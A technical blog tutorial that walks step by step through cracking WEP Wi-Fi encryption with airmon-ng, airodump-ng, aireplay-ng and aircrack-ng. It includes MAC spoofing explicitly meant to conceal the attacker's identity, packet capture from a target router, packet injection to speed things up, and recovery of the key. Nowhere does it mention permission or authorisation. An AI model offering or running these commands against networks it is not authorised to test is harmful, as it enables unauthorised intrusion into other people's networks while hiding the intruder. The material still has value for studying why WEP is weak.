Techblog

Technical Blog about all things computer

  • Aug 12

    1.) WEP is a weak encryption system. In this tutorial, we will crack WEP encryption using airmon-ng and obtain the key.

    2.) You will need a wireless card, airmon-ng and macchanger. I’m assuming that you already have a wireless card setup properly in LINUX Debian Distribution. Otherwise you will need to use ndiswrapper to set it up. See my blog on how to setup a “Wireless Bridge Router with Debian” to do this.

    3.) Inastall airmon-ng and macchanger

    apt-get install aircrack-ng

    apt-get install macchanger

    4.) To get a list of network interfaces. The screen shot below has the interface and drivername. I’m using the Trendnet TEW228-PI wireless card with the dirver name is rt18180. The interface is wlan0.

    airmon-ng

    Results for airmon-ng

    Results for airmon-ng

    5.) Stop airmon, bringdown the network and change your network card’s mac address to conceal your identity. Replace (interface) with the interface name found in the screen shot above.

    airmon-ng stop (interface)

    ifconfig (interface) down

    macchanger –mac 00:11:22:33:44:55 (interface)

    airmon-ng start (interface)

    My wireless card is configured to wlan0 so below is the statement.

    airmon-ng stop wlan0

    ifconfig wlan0 down

    macchanger –mac 00:11:22:33:44:55 wlan0

    airmon-ng start wlan0

    6.) Check out which wireless networks is avialble.

    airodump-ng (interface)

    if wlan0 is your interface,

    airodump-ng wlan0

    Provides a list of available wireless networks

    Provides a list of available wireless networks

    7.) The screen shot above contains the BSSID (That’s the MAC accdress of the router), PWR is the signal strength., #Data is the number of data packets read, CH is channel, MB is the transfer rate, ENC is the type of Encryption. In this excercise, we are only hacking WEP. WPA is a much stronger encryption and requires a different process to hack it. So we want to hack the “home” (ESSID) network. We do so by typing in the follwing.

    airodump-ng -c (channel) -w (file name) –bssid (bssid) (interface)

    Fill out the channel and bssid from the aprodump-ng (interface) results. Replace interface with your interface and filename is the file to write the captured data packets into. In my case, I ran the following.

    airodump-ng -c 6 -w home –bssid 00:12:0E:3C:BC:60 wlan0

    Starts capturing data into a file

    Starts capturing data into a file

    8.) #Data is the field we are interested in. It tells you how many data has been captured and written to the file. You will need at least 15,000 #Data to crack the WEP. I was able to crack “home” with 25,000 #Data leaving the computer running for 10 hours. This is the passive method of hacking. If you want to speed things up, you can force packets into the system but the disadvantage is it’s not that much faster and it prevents anybody from connecting to the network. See Active Hacking below for more info.

    9.) Finally after obtaining enough #Data, it’s time to get the key. Run this command.
    aircrack-ng -b (bssid) (file name-01.cap)

    in my case I had to type the follwoing:

    aircrack-ng -b 00:12:0E:3C:BC:60 home-03.cap

    10.) It should display something like this if the key is found

    KEY FOUND! [ 99:83:4E:00:38 ] (ASCII: ETND9 )

    99834E0038 is the WEP key.

    That’s it! Happy hacking!

     

    ACTIVE HACKING

    1.) Continuing from #8., start a new window and type the following:

    aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

    2.) Then run the follwoing:

    aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

    3.) Go back to Step #9 After getting enough #Data